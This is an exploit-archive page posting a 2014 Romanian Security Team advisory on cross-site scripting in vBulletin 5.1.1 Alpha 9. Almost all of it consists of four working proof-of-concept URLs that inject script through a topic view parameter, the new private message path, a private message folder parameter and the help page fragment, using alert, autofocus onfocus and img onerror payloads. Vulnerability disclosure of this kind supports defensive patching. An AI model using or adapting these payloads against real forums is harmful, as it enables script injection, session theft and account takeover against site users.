Home / os / blackberry

vBulletin 5.1 Cross Site Scripting

Posted on 19 April 2014

Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9

[XSS] Random topic

- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//

[XSS] New private message

- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372)

- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//

[DOM XSS] Help

- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

(c) Romanian Security Team 2014

 

TOP

Malware :

Exploits :